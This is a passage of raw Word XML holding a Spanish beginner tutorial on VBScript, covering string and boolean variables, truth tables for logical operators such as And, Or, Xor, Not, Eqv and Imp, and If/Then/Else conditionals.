              <w:ind w:left="0" w:right="675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Pedro" var2 = " y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X = "Hola, me llamo " &amp; Chr(34) &amp; var1 &amp; Chr(34) &amp; "." &amp; vbCrLf &amp; "Soy guay" &amp; var2 &amp; "guapo."</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hasta aquí la explicación de como introducir valores de cadena en las variables. Recordad que antes de usarlas debéis crearlas con el Option Explicit y el Dim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="32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Otro tipo de valor que se utilizará mucho en las variables es el booleano. Es decir, darle el valor Verdadero o Falso a una variable, simulando así un enunciado de la lógica matemática (filosofía), ya </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>que funciona igual. Me explico (se obvia la creación de las variables):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="808080"/>
        </w:pBdr>
        <w:spacing w:after="16" w:line="238" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="7028" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>var1 = false var2 = true De esta forma, var1 tiene el valor falso y var2 el valor true. Normalmente, este tipo de valores no se mezcla con los numéricos y los de cadena, pero si se diese el caso, las equivalencias serían:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8654" w:type="dxa"/>
        <w:tblInd w:w="21" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2842"/>
        <w:gridCol w:w="2826"/>
        <w:gridCol w:w="2986"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284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282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erdadero"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284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282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also"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="298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0</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ero ya he dicho, que mezclar los valores, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>no sería del todo correcto</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y, claro está, no sería normal...</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Como en los demás casos, se pueden realizar operaciones para darle valores a las variables. En este caso, serían operadores lógicos, que son los siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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nd</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El operador And (adición) se utiliza con dos operadores (como si fuera la suma), devuelve un valor Verdadero/Falso según la tabla siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="3790" w:type="dxa"/>
        <w:tblInd w:w="2453" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="39" w:type="dxa"/>
          <w:right w:w="31" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="1158"/>
        <w:gridCol w:w="1462"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2458" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>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1º Operador 2º Operador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1332"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ultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1236"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bl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="318"/>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form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por ejemplo tenemos lo siguiente, el resultado de var2 sería False:</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5606"/>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var1 = false var2 = (true And false) And var1</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is, también </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se pueden introducir variables</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con valores booleanos en las operaciones...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Or</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El operador Or (disyunción) se utiliza con dos operadores (igual que el And), devuelve un valor Verdadero/Falso según la tabla siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="3790" w:type="dxa"/>
        <w:tblInd w:w="2453" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="39" w:type="dxa"/>
          <w:right w:w="31" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="1158"/>
        <w:gridCol w:w="1462"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2458" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>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1º Operador 2º Operador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1332"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ultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1236"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forma que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por ejemplo, tenemos el ejemplo anterior con el Or, el resultado de var2 sería True:</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5898"/>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false var2 = (true Or false) Or var1</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guro que los que habéis estudiado </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>lógica matemática</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> esto os suena mucho...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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Xor</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El operador Xor (disyunción exclusiva) se utiliza con dos operadores y devuelve un valor Verdadero/Falso según la tabla siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="3790" w:type="dxa"/>
        <w:tblInd w:w="2453" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="39" w:type="dxa"/>
          <w:right w:w="31" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="1158"/>
        <w:gridCol w:w="1462"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2458" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>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1º Operador 2º Operador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1332"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ultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1236"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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>seguro que</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> con los ejemplos anteriores, podéis aclararos: Solo hay que sustituir el Or por el Xor y comprobar el resultado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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No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El Not (negador) es un operador lógico que utiliza un </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>solo operando</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, devolviendo el valor contrario que tiene. Es decir,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en el ejemplo siguiente, devolverá False:</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var1 = Not tru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Hay que fijarse que el Not va delante del valor y no detrás...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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El Eqv</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Eqv realiza la equivalencia lógica de dos valores booleanos. Se utiliza igual que el And o el Or, pero los valores que devuelve vienen </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dador</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por la siguiente tabla:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="3790" w:type="dxa"/>
        <w:tblInd w:w="2453" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="39" w:type="dxa"/>
          <w:right w:w="31" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="1158"/>
        <w:gridCol w:w="1462"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2458" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>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1º Operador 2º Operador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1332"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ultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1236"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bl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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El Imp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="26"/>
        <w:ind w:left="93" w:right="76"/>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Imp realiza la implicación lógica de dos valores booleanos. Se utiliza igual que el Eqv, pero los valores que devuelve vienen </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dador</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por la siguiente tabla:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="3790" w:type="dxa"/>
        <w:tblInd w:w="2453" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="39" w:type="dxa"/>
          <w:right w:w="31" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="1158"/>
        <w:gridCol w:w="1462"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2458" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>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1º Operador 2º Operador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1332"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ultado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="328"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1236"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bl>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t>Y con esto, ya está todo sobré el uso básico de las variables explicado: La creación, los valores numéricos, los valores de cadena y los valores boléanos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="139"/>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Control del Flujo</w:t>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control del flujo en un script es esencial, y para ello veremos diversas funciones que lo permiten. La primera es la sentencia If. La </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">sentencia If, recibe el nombre de sentencia porque no va en una sola línea, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> además, altera el flujo de ejecución del script: es un condicional. Me explico, la sentencia If se encarga de evaluar una expresión y ejecutar un trozo de script si se cumple. Pongamos un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1 = 0 Then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="808080"/>
        </w:pBdr>
        <w:spacing w:after="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la condición se cumple (variable es igual a 0) Else</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la condición no se cumple (variable diferente a 0)</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is, esta sentencia </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>no se coloca en una sola línea, sino en varias</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Se encarga de que, si la variable var1 es 0, se ejecuten unas acciones, mientras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no lo es, se ejecuten otras. La palabra If indica el inicio de la condicional, luego le sigue una expresión que indica la condición, luego la palabra Then, que indica la ejecución de unas funciones si la expresión es verdadera. Mas abajo se encuentra el Else, que se podría traducir como 'si no', y finalmente, el End If que indica el final de la condicional.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="318"/>
        <w:ind w:left="93"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>¿Liado? Es más sencillo de lo que parece. Veamos otro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0"/>
        <w:ind w:left="17" w:right="3026"/>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3 If var1 = 0 Then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="808080"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="808080"/>
        </w:pBdr>
        <w:spacing w:after="0"/>
        <w:ind w:left="17" w:right="3026"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>var2 = "El valor introducido es 0" Else</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3026"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>var2 = "El valor introducido no es 0"</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3026"/>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d If </w:t>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Esta claro que en este caso var2 obtendrá el valor "El valor introducido no es 0", porque si damos a var1 el valor 3, y luego decimos que si es 0 reciba un valor, y si no otro, claro está, que el valor que recibirá es el de debajo del Else.</w:t>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ahora fijémonos en la expresión que impone una condición: var1 = 0. El signo igual no es el único que se puede utilizar en una condicional, también existen el mayor que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>( &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), menor que ( &lt; ), menor o igual que ( &lt;= ), mayor o igual que ( &gt;= ) y diferente de ( &lt;&gt; ). De esa forma, en el siguiente ejemplo, se impone una condición diferente a la igualdad:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="4482" w:type="dxa"/>
        <w:tblInd w:w="21" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4482"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1708"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="448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38" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="279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var1 = -3 If var1 &lt; 0 Then</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2 = "El valor introducido es menor que 0" E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2 = "El valor introducido es mayor que 0" End If </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="26"/>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upongo que no tiene mas dificultad, ya que, obviamente, var2 obtendrá el valor "El valor introducido es menor que 0". Es necesario saber que también se pueden introducir </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>condicionales dentro de condicionales</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, parece lioso, pero no lo es tanto. Pongamos un ejemplo, que puede resultar ya un poco más complejo:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8412" w:type="dxa"/>
        <w:tblInd w:w="21" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="26" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
